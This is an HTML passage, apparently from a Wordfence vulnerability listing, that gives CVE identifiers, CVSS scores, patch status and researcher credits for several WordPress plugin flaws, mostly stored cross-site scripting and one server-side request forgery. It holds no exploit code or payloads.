						<a href="https://www.cve.org/CVERecord?id=CVE-2026-61959" target="_blank" rel="noopener noreferrer">							CVE-2026-61959						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/business-directory-plugin" target="_blank" rel="noopener">Business Directory Plugin – Easy Listing Directories for WordPress</a> <span class="wfvr-software-slug">[business-directory-plugin]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mukhlis-amien" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/45ee168e3ec0bb91083d6bb57a00e229.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="45ee168e3ec0bb91083d6bb57a00e229"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mukhlis-amien" target="_blank" rel="noopener">Mukhlis Amien</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/200f6173-72cd-4bf7-86b7-f5308b84364b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/658fdcf6-17e0-4cc7-accd-32c4e1e02779" target="_blank" rel="noopener">Codeless Page Builder &lt;= 1.1.4 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15234" target="_blank" rel="noopener noreferrer">							CVE-2026-15234						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 1, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/codeless-page-builder" target="_blank" rel="noopener">Codeless Page Builder</a> <span class="wfvr-software-slug">[codeless-page-builder]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/testoun" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/6354b317fcf2c6bde1d3a0b7e8bd25f0.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="6354b317fcf2c6bde1d3a0b7e8bd25f0"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/testoun" target="_blank" rel="noopener">testoun</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/658fdcf6-17e0-4cc7-accd-32c4e1e02779" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1f5390b1-c85b-4bf6-ab38-6ae0efe72ffa" target="_blank" rel="noopener">Contact Form to Any API &lt;= 3.0.6 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;cf7anyapi_form_field&#8217; Post Meta</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15735" target="_blank" rel="noopener noreferrer">							CVE-2026-15735						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/contact-form-to-any-api" target="_blank" rel="noopener">Contact Form to Any API</a> <span class="wfvr-software-slug">[contact-form-to-any-api]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1f5390b1-c85b-4bf6-ab38-6ae0efe72ffa" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/cc751980-987f-49c5-a9fb-16ba219c174a" target="_blank" rel="noopener">Cozy Blocks &lt;= 2.2.11 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;layoutCircle.alignment&#8217; Block Attribute</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15950" target="_blank" rel="noopener noreferrer">							CVE-2026-15950						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cozy-addons" target="_blank" rel="noopener">Cozy Blocks – Page Builder for Gutenberg Editor &amp; FSE with 700+ Patterns, 58 Blocks &amp; Templates</a> <span class="wfvr-software-slug">[cozy-addons]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/cc751980-987f-49c5-a9fb-16ba219c174a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e93de7ae-c3a8-4536-9c07-e64d7746e05f" target="_blank" rel="noopener">Cozy Blocks &lt;= 2.2.11 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;postMeta.font.size&#8217; Block Attribute</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15393" target="_blank" rel="noopener noreferrer">							CVE-2026-15393						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cozy-addons" target="_blank" rel="noopener">Cozy Blocks – Page Builder for Gutenberg Editor &amp; FSE with 700+ Patterns, 58 Blocks &amp; Templates</a> <span class="wfvr-software-slug">[cozy-addons]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e93de7ae-c3a8-4536-9c07-e64d7746e05f" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7a32393e-f233-4ab6-addc-9dd1e04c0e0a" target="_blank" rel="noopener">Download Manager &lt;= 3.3.66 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;icon&#8217; Shortcode Attribute</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16685" target="_blank" rel="noopener noreferrer">							CVE-2026-16685						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/download-manager" target="_blank" rel="noopener">Download Manager</a> <span class="wfvr-software-slug">[download-manager]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7a32393e-f233-4ab6-addc-9dd1e04c0e0a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/02103a32-4fac-401a-b995-e86dd734484b" target="_blank" rel="noopener">Easy Property Listings &lt;= 3.5.24 &#8211; Authenticated (Subscriber+) Stored Cross-Site Scripting via &#8216;facebook&#8217; User Contact Method</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16684" target="_blank" rel="noopener noreferrer">							CVE-2026-16684						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/easy-property-listings" target="_blank" rel="noopener">Easy Property Listings</a> <span class="wfvr-software-slug">[easy-property-listings]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/02103a32-4fac-401a-b995-e86dd734484b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/472dc1aa-d6b6-4f9d-99c2-ac5b1b417a3e" target="_blank" rel="noopener">Element Pack Addons for Elementor – Elementor Widgets, Elementor Templates, Elementor Addons &lt; 8.7.13 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14817" target="_blank" rel="noopener noreferrer">							CVE-2026-14817						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 2, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/bdthemes-element-pack-lite" target="_blank" rel="noopener">Element Pack Addons for Elementor – Elementor Widgets, Elementor Templates, Elementor Addons</a> <span class="wfvr-software-slug">[bdthemes-element-pack-lite]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pierre-rudloff" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/pierre-rudloff" target="_blank" rel="noopener">Pierre Rudloff</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/472dc1aa-d6b6-4f9d-99c2-ac5b1b417a3e" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3ddb9c46-683d-4eb4-a30f-f492d4f3ae2d" target="_blank" rel="noopener">Essential Addons for Elementor – Popular Elementor Templates &amp; Widgets &lt; 6.6.10 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-13344" target="_blank" rel="noopener noreferrer">							CVE-2026-13344						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 30, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/essential-addons-for-elementor-lite" target="_blank" rel="noopener">Essential Addons for Elementor – Popular Elementor Templates &amp; Widgets</a> <span class="wfvr-software-slug">[essential-addons-for-elementor-lite]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/revanth-hari-narayana-matte" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/8110ca50d15470d1569441aa4f6c445e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8110ca50d15470d1569441aa4f6c445e"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/revanth-hari-narayana-matte" target="_blank" rel="noopener">Revanth Hari Narayana Matte</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3ddb9c46-683d-4eb4-a30f-f492d4f3ae2d" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9b9d66db-53a8-4d93-9222-6f9649a7d842" target="_blank" rel="noopener">Exclusive Addons for Elementor &lt;= 2.7.9.8 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;exad_infobox_image&#8217;</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-12231" target="_blank" rel="noopener noreferrer">							CVE-2026-12231						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 1, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/exclusive-addons-for-elementor" target="_blank" rel="noopener">Exclusive Addons for Elementor</a> <span class="wfvr-software-slug">[exclusive-addons-for-elementor]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dmitrii" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/54998c6d0860cc6e1f5fee1e7efedb56.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="54998c6d0860cc6e1f5fee1e7efedb56"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dmitrii" target="_blank" rel="noopener">Dmitrii Ignatyev</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9b9d66db-53a8-4d93-9222-6f9649a7d842" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/181ad412-2c16-4866-b477-7ce65996adb9" target="_blank" rel="noopener">Feedzy &lt;= 5.2.4 &#8211; Authenticated (Contributor+) Server-Side Request Forgery</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66437" target="_blank" rel="noopener noreferrer">							CVE-2026-66437						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/feedzy-rss-feeds" target="_blank" rel="noopener">RSS Aggregator by Feedzy – Feed to Post, Autoblogging, News &amp; YouTube Video Feeds Aggregator</a> <span class="wfvr-software-slug">[feedzy-rss-feeds]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/181ad412-2c16-4866-b477-7ce65996adb9" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/21718974-6229-42ee-be71-fbd14be190d2" target="_blank" rel="noopener">Fluent Forms – Customizable Contact Forms, Survey, Quiz, &amp; Conversational Form Builder &lt; 6.2.6 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-11881" target="_blank" rel="noopener noreferrer">							CVE-2026-11881						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 30, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fluentform" target="_blank" rel="noopener">Fluent Forms – Customizable Contact Forms, Survey, Quiz, &amp; Conversational Form Builder</a> <span class="wfvr-software-slug">[fluentform]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/muni-nitish-kumar-yaddala-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/3bfe6fa6dcd46d4fe2d2e08ff44bcd5d.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="3bfe6fa6dcd46d4fe2d2e08ff44bcd5d"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/muni-nitish-kumar-yaddala-2" target="_blank" rel="noopener">Muni Nitish Kumar Yaddala</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/21718974-6229-42ee-be71-fbd14be190d2" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9b4d2561-34aa-493e-9dc7-50406dd7f9a4" target="_blank" rel="noopener">Gallery PhotoBlocks &lt;= 1.3.3 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66448" target="_blank" rel="noopener noreferrer">							CVE-2026-66448						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/photoblocks-grid-gallery" target="_blank" rel="noopener">Gallery PhotoBlocks</a> <span class="wfvr-software-slug">[photoblocks-grid-gallery]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/muhammad-sharief" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/553cb97e15a106a04fa7e72b813e84b1.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="553cb97e15a106a04fa7e72b813e84b1"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/muhammad-sharief" target="_blank" rel="noopener">Muhammad Sharief</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9b4d2561-34aa-493e-9dc7-50406dd7f9a4" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d9f257a9-d447-407c-83ae-3cc99254be3f" target="_blank" rel="noopener">GamiPress &lt;= 7.9.9.1 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;gamipress_rank&#8217; Shortcode</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-16091" target="_blank" rel="noopener noreferrer">							CVE-2026-16091						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 31, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gamipress" target="_blank" rel="noopener">GamiPress – Gamification plugin to reward points, achievements, badges &amp; ranks in WordPress</a> <span class="wfvr-software-slug">[gamipress]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
